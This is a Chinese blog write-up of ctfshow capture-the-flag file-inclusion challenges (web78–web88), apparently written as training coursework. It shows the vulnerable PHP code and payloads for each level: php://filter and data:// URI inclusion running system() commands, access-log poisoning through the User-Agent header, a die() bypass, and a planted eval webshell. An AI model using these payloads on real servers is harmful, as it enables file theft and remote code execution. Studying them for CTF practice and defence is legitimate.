ctfshow 文件包含

已于 2022-07-31 02:03:25 修改
阅读量277 收藏
点赞数
分类专栏: 暑假第二周作业 文章标签: php 开发语言 前端
于 2022-07-28 23:57:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63253040/article/details/126046116
版权

web78

进入环境

 直接利用php://filter伪协议读取flag.php文件

?file=php://filter/read=convert.base64-encode/resource=flag.php

 base64解码得到flag

web79

 <?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

str_replace替换字符串

将变量file中的php替换成???

那我们这里就不能用php伪协议了换data协议并用base64加密

?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdscycpOyA/Pg==

?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
<?php system('cat flag.php'); ?>

 web80

 <?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

同上过滤php,data

正常服务器中的日志文件位置:

/var/log/nginx/access.log
/var/log/apache2/access.log

这里包含日志文件来getshell

 可以看见日志文件会记录User-Agent

抓包修改User-Agent

<?php system('ls');?>

<?php system('cat fl0g.php');?>

web81

 <?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

同上过滤php,data,:

使用日志文件getshell

和上题一样

web82

<?php
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}
?>

.也过滤了日志包含不行

web87

 <?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $content = $_POST['content'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);

    
}else{
    highlight_file(__FILE__);
}

file_put_contents使用php://filter绕过,这里用base64绕过

php://filter/convert.base64-decode/resource=s1mple.php

因为有urldecode解码且上面有php,data,:,.的过滤我们对其url2次编码绕过

因为url编码无法对英文字符直接编码,但原理是编码成16进制在前面再加上%

所以我们直接Hex编码加上%

绕后再进行一次url编码就可以了

 

 

绕过死亡函数die

phpdie六个字符,base64解码需要四个一组所以再加上两个a

在其后面加上一句话木马<?php @eval($_POST['zxc']);?>

aaPD9waHAgQGV2YWwoJF9QT1NUWyd6eGMnXSk7Pz4=

即content=aaPD9waHAgQGV2YWwoJF9QT1NUWyd6eGMnXSk7Pz4=

用post传参

 然后访问s1mple.php

 命令执行

 

web88

<?php

if(isset($_GET['file'])){
    $file = $_GET['file'];
    if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
}

和79一样用data协议但是base64编码后需要去掉=

 

白塔河冲浪手
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFSHOW文件包含
Yb_140的博客
04-06 4500
服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接) 文件包含函数: 函数 区别 require() 在包含的过程中如果出现错误,会直接报错并退出程序的执行 include() 在包含的过程中如果出现错误,会抛出一个警告,程
ctfshow web入门 文件包含
Lum1n0us's Blog
02-03 795
文章目录web78web79web80-81web82-86web87web88web116web117参考链接 web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 第一题是最基础的文件包含,直接上payload payload: ?file=php://filter/convert.base64-enco
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7104
个人ctfshow刷题记录
CTFshow-文件包含
qq_61376069的博客
01-19 247
CTFshow入门——文件包含
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
ctfshow-文件包含
m0_74456293的博客
03-27 522
ctfshow-文件包含
ctfshow文件包含(非条件竞争)
qq_63928796的博客
10-06 845
伪协议读取后base64解密?
BUUCTF Basic 解题记录--BUU LFI COURSE 1
最新发布
weixin_43171033的博客
09-14 936
BUUCTF Basic 解题记录--BUU LFI COURSE 1
ctfshow-web79(文件包含)
m0_62094846的博客
01-11 553
if(isset($_GET['file'])){ $file = $_GET['file']; $file = str_replace("php", "???", $file); include($file); }else{ highlight_file(__FILE__); } 过滤了php,如果用上题的php://file怎么都解不开,可以使用data ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQg.
web入门-文件包含
wo41ge的博客
11-28 3264
web78~php伪协议 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 直接payload ?file=php://filter/read=convert.base64-encode/resource=flag.php web79~Data协议 <?php if(isset($_GET['file
CTFshow刷题日记-WEB-文件包含
Love&Share
09-04 4099
文件包含专题 web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 依旧是代码审计类型 直接伪协议 ?file=php://filter/convert.base64-encode/resource=flag.php ?file=data://text/plain,<?php system("nl flag.php");
php 替换文件,用php替换文件中的字符串
weixin_26841743的博客
03-10 203
我正在为我的网络应用程序编写一个电子邮件模块,该模块在完成注册等任务时向用户发送html电子邮件.现在,由于此电子邮件的格式可能会发生变化,因此我决定使用模板html页面作为电子邮件,其中包含需要替换的自定义标记,例如%fullname%.我的函数有一个数组格式的数组(%fullname%=>’Joe Bloggs’);使用密钥作为标记标识符以及需要替换它的值.我尝试过以下方法:$fp = ...
shownews.php,ctfshow web入门 文件包含(持续更新)
weixin_34433661的博客
04-01 200
文章目录web78web79web80-81web82web78if(isset($_GET['file'])){$file = $_GET['file'];include($file);}else{highlight_file(__FILE__);}第一题是最基础的文件包含,直接上payloadpayload:?file=php://filter/convert.base64-encode/re...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值